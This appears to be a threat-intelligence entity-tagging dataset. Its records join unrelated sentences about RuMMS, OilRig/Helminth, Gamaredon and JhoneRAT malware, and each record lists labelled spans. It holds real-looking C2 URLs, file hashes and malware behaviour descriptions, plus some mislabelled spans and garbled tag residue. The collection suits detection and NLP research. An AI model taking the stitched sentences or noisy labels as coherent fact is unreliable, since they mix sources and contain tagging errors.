Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office . After that , the malware checks if the existence of the \ufb01les \u201c ExcelMyMacros.txt \u201d and \u201c wordMacros.txt \u201d in the same path where it is executed : if true then it reads their contents otherwise it will exit . 
None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 29, "end": 42, "label": "Indicator"}, {"start": 60, "end": 92, "label": "Indicator"}, {"start": 104, "end": 109, "label": "Malware"}, {"start": 158, "end": 172, "label": "System"}, {"start": 208, "end": 218, "label": "Organization"}, {"start": 229, "end": 249, "label": "Organization"}, {"start": 260, "end": 279, "label": "Organization"}, {"start": 345, "end": 362, "label": "Indicator"}, {"start": 371, "end": 385, "label": "Indicator"}, {"start": 528, "end": 548, "label": "Organization"}, {"start": 654, "end": 672, "label": "System"}]} {"text": "Several of the main components of RuMMS are shown in Figure 2 . In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate . As visible in the previous \ufb01gure , the only difference between the \ufb01les are in the variable , registry key and path used by Word rather than by Excel . All of these things point to threat actors and groups like Winnti will continue to try different methods of attack .", "spans": [{"start": 34, "end": 39, "label": "Malware"}, {"start": 150, "end": 181, "label": "System"}, {"start": 328, "end": 333, "label": "System"}, {"start": 365, "end": 378, "label": "Organization"}, {"start": 395, "end": 401, "label": "Organization"}]} {"text": "The activity class \u201c org.starsizew.MainActivity \u201d executes when the app is started . In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" . Finally the macros are executed using the Of\ufb01ce engine . 
If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload \u2022 None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": [{"start": 21, "end": 47, "label": "Indicator"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 153, "end": 166, "label": "Organization"}, {"start": 197, "end": 204, "label": "Organization"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 241, "end": 258, "label": "System"}, {"start": 263, "end": 278, "label": "System"}, {"start": 358, "end": 364, "label": "System"}, {"start": 388, "end": 393, "label": "System"}, {"start": 532, "end": 674, "label": "Indicator"}]} {"text": "It first starts another activity defined in \u201c org.starsizew.Aa \u201d to request device administrator privileges , and then calls the following API of \u201c android.content.pm.PackageManager \u201d ( the Android package manager to remove its own icon on the home screen in order to conceal the existence of RuMMS from the user : At the same time , \u201d org.starsizew.MainActivity \u201d will start the main service as defined in \u201c org.starsizew.Tb \u201d , and use a few mechanisms to keep the main service running continuously In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia . So let \u2019s start to dissect the macros . 
Unlike a number of past cases of Iranian statesponsored social media phishing that have focused on Irans neighbors , this latest campaign appears to have largely targeted Americans and to a lesser extent British and European victims .", "spans": [{"start": 46, "end": 62, "label": "Indicator"}, {"start": 148, "end": 181, "label": "Indicator"}, {"start": 190, "end": 197, "label": "System"}, {"start": 293, "end": 298, "label": "Malware"}, {"start": 336, "end": 362, "label": "Indicator"}, {"start": 409, "end": 425, "label": "Indicator"}, {"start": 515, "end": 522, "label": "Organization"}, {"start": 543, "end": 549, "label": "Organization"}, {"start": 571, "end": 593, "label": "Organization"}, {"start": 598, "end": 622, "label": "Organization"}, {"start": 676, "end": 682, "label": "System"}, {"start": 784, "end": 799, "label": "Organization"}, {"start": 807, "end": 822, "label": "Organization"}, {"start": 856, "end": 865, "label": "Organization"}, {"start": 889, "end": 917, "label": "Organization"}]} {"text": "in the background . In recent OilRig attacks , the threat actors purport to be legitimate service providers offering service and technical troubleshooting as a social engineering theme in their spear-phishing attacks . For a better comprehension we will be considering only one macro and in the speci\ufb01c case we will analyze \u201c wordMacros.txt \u201d ones . 
After encryption , the malware attempts to run the following command to delete volume shadow backup copies \"", "spans": [{"start": 51, "end": 64, "label": "Organization"}, {"start": 79, "end": 107, "label": "Organization"}, {"start": 160, "end": 178, "label": "Organization"}, {"start": 278, "end": 283, "label": "System"}, {"start": 326, "end": 340, "label": "Indicator"}, {"start": 373, "end": 380, "label": "Malware"}]} {"text": "The class \u201c org.starsizew.Ac \u201d is designed for this purpose ; its only task is to check if the main service is running , and restart the main service if the answer is no . The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' . First of all the macro will set the registry key \u201c HKEY_CURRENT_USER\\Software\\Microsoft\\Of\ufb01ce\\ \u201d & Application.Version & _ \u201d \\Word\\Security\\ \u201d and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes : the \ufb01rst one will run a \u201c IndexOf\ufb01ce.vbs \u201d in the path \u201c %APPDATA%\\Microsoft\\Of\ufb01ce\\ \u201d and the second one will run \u201c IndexOf\ufb01ce.exe \u201d in the same path . \" If you ve read about recent cyber attacks in the news , you might be wondering why cyber criminals try to hack into other systems and what motivates them .", "spans": [{"start": 12, "end": 28, "label": "Indicator"}, {"start": 250, "end": 258, "label": "System"}, {"start": 280, "end": 285, "label": "System"}, {"start": 528, "end": 542, "label": "Indicator"}, {"start": 618, "end": 632, "label": "Indicator"}, {"start": 739, "end": 754, "label": "Organization"}]} {"text": "The class \u201c org.starsizew.Tb \u201d also has a self-monitoring mechanism to restart itself when its own onDestroy API is triggered . 
Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 . Finally , the malware will write the \u201c IndexOf\ufb01ce.txt \u201d \ufb01le in the \u201c %APPDATA%\\Microsoft\\Of\ufb01ce\\ \u201d path . In early 2020 , new versions of Foudre a malware associated with the APT Advanced Persistent Threat Infy discussed in detail below emerged with new and improved elements from previous versions .", "spans": [{"start": 12, "end": 28, "label": "Indicator"}, {"start": 235, "end": 251, "label": "Organization"}, {"start": 401, "end": 415, "label": "Indicator"}, {"start": 499, "end": 505, "label": "Malware"}, {"start": 508, "end": 515, "label": "Malware"}, {"start": 536, "end": 571, "label": "Organization"}]} {"text": "Other than that , its major functionality is to collect private device information , upload it to a remote C2 server , and handle any commands as requested by the C2 server . In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia . The script will check the presence of the \u201c IndexOf\ufb01ce.exe \u201d artifact : if true then it will delete it and it will download a new \ufb01le/script from \u201c http://masseffect.space/_/post.php \u201d . To date , the ransomware has only been used in a limited fashion .", "spans": [{"start": 189, "end": 196, "label": "Organization"}, {"start": 324, "end": 347, "label": "Organization"}, {"start": 414, "end": 428, "label": "Indicator"}, {"start": 518, "end": 575, "label": "Indicator"}, {"start": 594, "end": 604, "label": "Malware"}]} {"text": "All those functions are implemented in asynchronous tasks by \u201c org.starsizew.i \u201d . 
Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable . The malware tries to save the C2 response and encoding it using Encode function . Cisco Secure Network / Cloud Analytics ( Stealthwatch / Stealthwatch Cloud ) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device .", "spans": [{"start": 63, "end": 78, "label": "Indicator"}, {"start": 173, "end": 190, "label": "System"}, {"start": 367, "end": 369, "label": "System"}, {"start": 419, "end": 457, "label": "System"}, {"start": 460, "end": 493, "label": "System"}]} {"text": "The class \u201c org.starsizew.Ma \u201d is registered to intercept incoming SMS messages , the arrival of which will trigger the Android system to call its \u201c onReceive \u201d API . FireEye also reported on these attacks in a May 22 blog post . This function accepts three parameters : the input \ufb01le , the output \ufb01le and the arrKey ; arrKey is calculated thanks to GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results . 
The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": [{"start": 12, "end": 28, "label": "Indicator"}, {"start": 120, "end": 127, "label": "System"}, {"start": 167, "end": 174, "label": "Organization"}, {"start": 417, "end": 426, "label": "System"}, {"start": 569, "end": 592, "label": "Organization"}]} {"text": "Its major functionality is also implemented through the call of the asynchronous task ( \u201c org.starsizew.i \u201d ) , including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker . The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan . Gamaredon cyberwarfare operations against Ukraine are still active . However , the self - proclaimed hacktivist group Anonymous Sudan appears to have increased KillNet \u2019s capabilities and the group has become the collective \u2019s most prolific affiliate in 2023 , conducting a majority of claimed DDoS attacks .", "spans": [{"start": 90, "end": 105, "label": "Indicator"}, {"start": 274, "end": 282, "label": "System"}, {"start": 303, "end": 317, "label": "System"}, {"start": 346, "end": 359, "label": "System"}, {"start": 362, "end": 371, "label": "Organization"}, {"start": 441, "end": 479, "label": "Organization"}, {"start": 480, "end": 495, "label": "Organization"}, {"start": 522, "end": 545, "label": "Organization"}, {"start": 656, "end": 668, "label": "Organization"}]} {"text": "C2 Communication The C2 communication includes two parts : sending information to the remote HTTP server and parsing the server \u2019 s response to execute any commands as instructed by the remote attackers . 
The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries . This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years . As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Tribunal ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": [{"start": 209, "end": 217, "label": "System"}, {"start": 358, "end": 362, "label": "System"}, {"start": 367, "end": 370, "label": "System"}, {"start": 582, "end": 640, "label": "Organization"}, {"start": 651, "end": 658, "label": "Organization"}, {"start": 670, "end": 679, "label": "Organization"}]} {"text": "The functionality for these two parts is implemented by doInBackground and onPostExecute respectively , two API methods of \u201c android.os.AsyncTask \u201d as extended by class \u201c org.starsizew.i \u201d . Helminth executable samples send artifacts within network beacons to its C2 server that the Trojan refers to as a ' Group ' and ' Name ' . The massive use of weaponized Of\ufb01ce documents , Of\ufb01ce S-TOOL template injection , sfx archives , wmi and some VBA macro stages S-TOOL that dinamically changes , make the Pterodon attack chain very malleable and adaptive . This is further advanced in the National Institute of Standards and Technology NIST 80037 Risk Management Framework when it says", "spans": [{"start": 125, "end": 145, "label": "Indicator"}, {"start": 171, "end": 186, "label": "Indicator"}, {"start": 191, "end": 199, "label": "System"}, {"start": 360, "end": 365, "label": "System"}, {"start": 412, "end": 424, "label": "System"}, {"start": 427, "end": 430, "label": "System"}, {"start": 440, "end": 463, "label": "System"}, {"start": 500, "end": 508, "label": "Malware"}, {"start": 580, "end": 667, "label": "Organization"}]} {"text": "Figure 3 . 
It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . However , the introduction of a .Net component is a novelty compared to previous Pterodon samples . \u2022 Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 172, "end": 190, "label": "Organization"}, {"start": 195, "end": 213, "label": "Organization"}, {"start": 248, "end": 252, "label": "System"}, {"start": 297, "end": 305, "label": "Malware"}, {"start": 318, "end": 425, "label": "Indicator"}]} {"text": "Method doInBackground : to send information to remote C2 server As seen from the major code body of method doInBackground shown in Figure 3 ( some of the original classes and methods are renamed for easier understanding ) , there are three calls to HttpPost with different contents as parameters . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . Gamaredon : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a . The term has been around since the 1990s , and the first spyware to be identified was developed by criminals to steal passwords or financial information from devices .", "spans": [{"start": 318, "end": 323, "label": "Organization"}, {"start": 459, "end": 477, "label": "Organization"}, {"start": 482, "end": 500, "label": "Organization"}, {"start": 503, "end": 512, "label": "Organization"}, {"start": 515, "end": 579, "label": "Indicator"}]} {"text": "At line 5 , local variable v4 specifies the first parameter url , which can be changed by the remote C2 server later . 
This suggests that the threat actors are not only focused on financial organizations , as their target set could include other industries as well . Gamaredon : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": [{"start": 142, "end": 155, "label": "Organization"}, {"start": 180, "end": 203, "label": "Organization"}, {"start": 267, "end": 276, "label": "Organization"}, {"start": 279, "end": 343, "label": "Indicator"}, {"start": 361, "end": 374, "label": "Vulnerability"}]} {"text": "These URLs are all in the form of \u201c http : // $ C2. $ SERVER. $ IP/api/ ? The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note . Gamaredon : def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c . Although the primary target is believed to have been the Ukrainian military , other customers were affected , including personal and commercial internet users .", "spans": [{"start": 36, "end": 73, "label": "Indicator"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 177, "end": 241, "label": "Indicator"}, {"start": 297, "end": 319, "label": "Organization"}, {"start": 364, "end": 402, "label": "Organization"}]} {"text": "id= $ NUM \u201d . The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir . Gamaredon : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f . 
But what happens when an unidentified virus infects a victims computer Antivirus programs can only protect against threats they already know .", "spans": [{"start": 106, "end": 120, "label": "Organization"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 226, "end": 290, "label": "Indicator"}, {"start": 318, "end": 336, "label": "Malware"}, {"start": 364, "end": 382, "label": "Organization"}]} {"text": "The second parameter is a constant string \u201c POST \u201d , and the third parameter is a series of key-value pairs to be sent , assembled at runtime . The mydomain1110.com domain did not appear to reuse any of the previously observed WHOIS data artifacts , but did still give a geolocation of Tehran in addition to the use of an email address linked to other domains thematically similar to the know command and control domains and are potentially related . Gamaredon : 86977a785f361d4f26eb3e189293c0e30871de3c93b19653c26a31dd4ed068cc . According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": [{"start": 451, "end": 460, "label": "Organization"}, {"start": 463, "end": 527, "label": "Indicator"}, {"start": 543, "end": 552, "label": "Organization"}, {"start": 597, "end": 613, "label": "Organization"}]} {"text": "The value of the first item , whose key is \u201c method \u201d ( line 7 ) , indicates the type of the contents : install , info and sms . While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload . Gamaredon : http://win-apu.ddns.net/apu.dot/ . 
None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": [{"start": 254, "end": 259, "label": "Organization"}, {"start": 263, "end": 276, "label": "Organization"}, {"start": 322, "end": 331, "label": "Organization"}, {"start": 334, "end": 366, "label": "Indicator"}]} {"text": "The first type of content , starting with \u201c method=install \u201d , will be sent when the app is started for the first time , including the following device private information : Victim identifier Network operator Device model Device OS version Phone number Device identifier App version Country The second type of information will be sent periodically to indicate that the device is alive . The two variants of Helminth do require different delivery methods , with the script variant relying on an Excel spreadsheet for delivery , while the executable variant is more traditional in the fact that it can be installed without a delivery document . Gamaredon : http://get-icons.ddns.net/apu.dot/ . Monitor MSSQL Servers with access to OT systems and networks for evidence of : \u2022 Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": [{"start": 407, "end": 415, "label": "System"}, {"start": 643, "end": 652, "label": "Organization"}, {"start": 655, "end": 689, "label": "Indicator"}, {"start": 773, "end": 845, "label": "Indicator"}]} {"text": "It only has two parts , the method indicated by word \u201c info \u201d and the victim identifier . Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity . Gamaredon : http://masseffect.space/ . 
Researchers at Cisco Talos recently wrote an \u2018 On the Radar \u2019 article about the growth of spyware - based intelligence providers , without legal or ethical supervision .", "spans": [{"start": 196, "end": 201, "label": "Organization"}, {"start": 221, "end": 230, "label": "Organization"}, {"start": 233, "end": 257, "label": "Indicator"}, {"start": 275, "end": 286, "label": "Organization"}, {"start": 350, "end": 388, "label": "Organization"}]} {"text": "The third type of information will be sent when RuMMS intercepts any SMS messages , including the balance inquiry results when it contacts the SMS code of a particular financial service . Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States . JhoneRAT : Cloud based python RAT targeting Middle Eastern countries . The Twitter handle used by Hack520 indicates also an \u201c est \u201d portion .", "spans": [{"start": 48, "end": 53, "label": "Malware"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 354, "end": 378, "label": "Organization"}, {"start": 422, "end": 430, "label": "Malware"}, {"start": 445, "end": 451, "label": "System"}, {"start": 452, "end": 455, "label": "System"}, {"start": 520, "end": 527, "label": "Organization"}]} {"text": "Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker . The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims . Today , Cisco Talos is unveiling the details of a new RAT we have identified we 're calling \" JhoneRAT \" . 
Lateral Movement to SCADA Hypervisor and OT Attack Execution", "spans": [{"start": 133, "end": 138, "label": "Organization"}, {"start": 283, "end": 294, "label": "Organization"}, {"start": 329, "end": 332, "label": "System"}, {"start": 369, "end": 377, "label": "Malware"}, {"start": 402, "end": 418, "label": "System"}]} {"text": "As seen from the code in Figure 5 , the commands RuMMS supports right now include : install_true : to modify app preference to indicate that the C2 server received the victim device \u2019 s status . In addition to these instances , multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth samples earlier this year . This new RAT is dropped to the victims via malicious Microsoft Office B-IDTY I-TOOL docume S-TOOLnts . It will then attempt to wipe the physical drive partition itself .", "spans": [{"start": 49, "end": 54, "label": "Malware"}, {"start": 237, "end": 257, "label": "Organization"}, {"start": 310, "end": 326, "label": "System"}, {"start": 356, "end": 359, "label": "System"}, {"start": 400, "end": 409, "label": "System"}]} {"text": "sms_send : to send C2-specified SMS messages to C2-specified recipients . While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments . The dropper , along with the Python RAT E-TOOL , attempts to gather information on the victim 's machine and then uses multiple cloud services : Google Drive , Twitter , ImgBB and Google Forms . 
As well as its custom malware , Budworm also used a variety of livingofftheland and publicly available tools in these attacks .", "spans": [{"start": 284, "end": 290, "label": "System"}, {"start": 291, "end": 301, "label": "System"}, {"start": 400, "end": 412, "label": "System"}, {"start": 415, "end": 422, "label": "System"}, {"start": 425, "end": 430, "label": "System"}, {"start": 435, "end": 447, "label": "System"}, {"start": 472, "end": 479, "label": "Malware"}, {"start": 482, "end": 489, "label": "Organization"}, {"start": 513, "end": 558, "label": "System"}]} {"text": "sms_grab : to upload periodically the SMS messages in the inbox to C2 server . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The RAT attempts to download additional payloads and upload the information gathered during the reconnaissance phase . Possible locations are \u201c Config \u201d , \u201c Static \u201d , or \u201c Path \u201d followed by a file path .", "spans": [{"start": 102, "end": 111, "label": "Organization"}, {"start": 131, "end": 145, "label": "Vulnerability"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 186, "end": 194, "label": "Organization"}, {"start": 220, "end": 250, "label": "Vulnerability"}, {"start": 263, "end": 286, "label": "Organization"}, {"start": 312, "end": 315, "label": "System"}, {"start": 427, "end": 511, "label": "Indicator"}]} {"text": "delivery : to deliver specified text to all victim \u2019 s contacts ( SMS worming ) . We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives . This particular RAT attempts to target a very specific set of Arabic-speaking countries . 
Change it Up in 2023 Get Ahead of Known Vulnerabilities", "spans": [{"start": 145, "end": 173, "label": "Organization"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 212, "end": 238, "label": "System"}, {"start": 283, "end": 286, "label": "System"}]} {"text": "call_number : to forward phone calls to intercept voice based two-factor authentication . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East . The filtering is performed by checking the keyboard layout of the infected systems . The VBA code in all files is similar , with minor variations , where some functions serve a legitimate purpose ( e.g. , some functions for conversion of strings into numbers in Excel ) .", "spans": [{"start": 95, "end": 107, "label": "Organization"}, {"start": 181, "end": 190, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}, {"start": 206, "end": 212, "label": "Organization"}, {"start": 215, "end": 223, "label": "Organization"}, {"start": 230, "end": 248, "label": "Organization"}, {"start": 469, "end": 510, "label": "Malware"}, {"start": 520, "end": 582, "label": "Malware"}]} {"text": "new_url : to change the URL of the C2 server in the app preference . We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests . Based on the analysed sample , JhoneRAT targets Saudi Arabia , Iraq , Egypt , Libya , Algeria , Morocco , Tunisia , Oman , Yemen , Syria , UAE , Kuwait , Bahrain and Lebanon . 
We urge asset owners to review and implement the following recommendations to mitigate and detect this activity .", "spans": [{"start": 84, "end": 89, "label": "Organization"}, {"start": 317, "end": 325, "label": "Malware"}, {"start": 470, "end": 482, "label": "Organization"}]} {"text": "ussd : to call a C2-specified phone number . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts , sometimes coupled with social engineering tactics . The campaign shows an actor that developed a homemade RAT that works in multiple layers hosted on cloud providers . There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 65, "end": 92, "label": "System"}, {"start": 144, "end": 164, "label": "System"}, {"start": 377, "end": 385, "label": "Organization"}, {"start": 422, "end": 444, "label": "Organization"}, {"start": 492, "end": 506, "label": "Organization"}]} {"text": "Figure 5 . We believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 . JhoneRAT is developed in python but not based on public source code , as it is often the case for this type of malware . 
In that campaign , the attackers also targeted the government of a Middle Eastern country , a multinational electronics manufacturer , and a hospital in Southeast Asia .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 212, "end": 220, "label": "Malware"}, {"start": 237, "end": 243, "label": "System"}, {"start": 341, "end": 349, "label": "Organization"}, {"start": 384, "end": 422, "label": "Organization"}, {"start": 427, "end": 465, "label": "Organization"}, {"start": 474, "end": 500, "label": "Organization"}]} {"text": "Method onPostExecute : to handle instructions from remote C2 Figure 6 shows an example response sent back from one C2 server . In May 2016 , we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware . The attackers put great effort to carefully select the targets located in specific countries based on the victim 's keyboard layout . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": [{"start": 207, "end": 212, "label": "Organization"}, {"start": 289, "end": 303, "label": "System"}, {"start": 511, "end": 537, "label": "Organization"}, {"start": 540, "end": 556, "label": "Organization"}, {"start": 561, "end": 572, "label": "Organization"}, {"start": 586, "end": 659, "label": "Organization"}]} {"text": "Note that inside this single response , there is one \u201c install_true \u201d command , one \u201c sms_grab \u201d command and four \u201c sms_send \u201d commands . In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware . 
Everything starts with a malicious document using a well-known vulnerability to download a malicious document hosted on the internet . It is possible that the malware was used to support exercises such as the ones hosted by Rostelecom - Solar in 2021 in collaboration with the Russian Ministry of Energy or in 2022 for the ( SPIEF ) .", "spans": [{"start": 165, "end": 170, "label": "Organization"}, {"start": 216, "end": 241, "label": "System"}, {"start": 255, "end": 263, "label": "System"}, {"start": 341, "end": 352, "label": "System"}, {"start": 552, "end": 559, "label": "Malware"}, {"start": 617, "end": 635, "label": "Organization"}, {"start": 670, "end": 696, "label": "Organization"}, {"start": 718, "end": 723, "label": "Organization"}]} {"text": "With the four \u201c sms_send \u201d commands , the messages as specified in the key \u201c text \u201d will be sent immediately to the specified short numbers . APT34 loosely aligns with public reporting related to the group \" OilRig \" . For this campaign , the attacker chose to use a cloud provider ( Google ) with a good reputation to avoid URL blacklisting . In the USA , Vice Society is the most active among a group of gangs .", "spans": [{"start": 142, "end": 147, "label": "Organization"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 208, "end": 214, "label": "Organization"}, {"start": 284, "end": 290, "label": "System"}, {"start": 357, "end": 369, "label": "Organization"}]} {"text": "Our analysis suggests that the four short numbers are associated with Russian financial institutions , presumably where a victim would be likely to have accounts . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . The malware is divided into a couple of layers \u2014 each layer downloads a new payload on a cloud provider to get the final RAT developed in python and that uses additional providers such as Twitter and ImgBB . 
The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": [{"start": 207, "end": 216, "label": "Malware"}, {"start": 232, "end": 245, "label": "Vulnerability"}, {"start": 369, "end": 372, "label": "System"}, {"start": 386, "end": 392, "label": "System"}, {"start": 436, "end": 443, "label": "System"}, {"start": 448, "end": 453, "label": "System"}, {"start": 460, "end": 470, "label": "Organization"}, {"start": 534, "end": 538, "label": "Organization"}, {"start": 545, "end": 569, "label": "Organization"}, {"start": 595, "end": 603, "label": "Organization"}]} {"text": "Figure 6 . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . This RAT is a good example of how a highly focused attack that tries to blend its network traffic into the crowd can be highly effective . Copies of the site at archive.org show it was the work of someone calling themselves \u201c The Chaos Creator . \u201d", "spans": [{"start": 37, "end": 42, "label": "Organization"}, {"start": 64, "end": 94, "label": "Vulnerability"}, {"start": 95, "end": 109, "label": "Vulnerability"}, {"start": 120, "end": 128, "label": "System"}, {"start": 133, "end": 144, "label": "System"}, {"start": 152, "end": 155, "label": "System"}, {"start": 373, "end": 390, "label": "Organization"}]} {"text": "Example Response in JSON format In particular , short number \u201c +7494 \u201d is associated with a payment service provider in Russia . The vulnerability was patched by Microsoft on Nov 14 , 2017 . In this campaign , focusing detection of the network is not the best approach . 
Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": [{"start": 162, "end": 171, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 326, "end": 340, "label": "Organization"}]} {"text": "The provider \u2019 s website described how the code 7494 can be used to provide a series of payment-related capabilities . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . Instead , the detection must be based on the behaviour on the operating system . For this reason it is important to note that some organizations and systems may simply be convenient targets which enable and facilitate attackers actions .", "spans": [{"start": 155, "end": 170, "label": "System"}, {"start": 173, "end": 185, "label": "Malware"}, {"start": 238, "end": 279, "label": "Malware"}, {"start": 413, "end": 426, "label": "Organization"}, {"start": 431, "end": 438, "label": "Organization"}]} {"text": "For example , sending text \u201c Balance \u201d will trigger a response with the victim \u2019 s wallet balance . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . Attackers can abuse well-known cloud providers and abuse their reputations in order to avoid detection . 
To boot , there was a 75 percent increase in the average number of monthly attacks in the US between the first and second half of the last 12 months .", "spans": [{"start": 129, "end": 134, "label": "Organization"}, {"start": 225, "end": 238, "label": "Vulnerability"}, {"start": 243, "end": 257, "label": "Vulnerability"}, {"start": 325, "end": 351, "label": "System"}, {"start": 430, "end": 473, "label": "Indicator"}, {"start": 477, "end": 492, "label": "Organization"}, {"start": 503, "end": 558, "label": "Indicator"}]} {"text": "Sending text \u201c confirm 1 \u201d will include proof of payment . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region . The fact that this attacker decided to leverage cloud services and four different services \u2014 and not their own infrastructure \u2014 is smart from an opsec point of view . Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows ( e.g extraneous packets that do not belong to established flows , or gratuitous or anomalous traffic patterns ) .", "spans": [{"start": 63, "end": 75, "label": "Organization"}, {"start": 82, "end": 87, "label": "Organization"}, {"start": 90, "end": 102, "label": "Organization"}, {"start": 134, "end": 143, "label": "Organization"}, {"start": 240, "end": 254, "label": "System"}, {"start": 259, "end": 282, "label": "System"}, {"start": 468, "end": 526, "label": "Indicator"}, {"start": 532, "end": 572, "label": "Indicator"}]} {"text": "Sending text \u201c call on \u201d will activate the USSD payment confirmation service . We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region . It is hard for the targets to identify legitimate and malicious traffic to cloud provider infrastructure . 
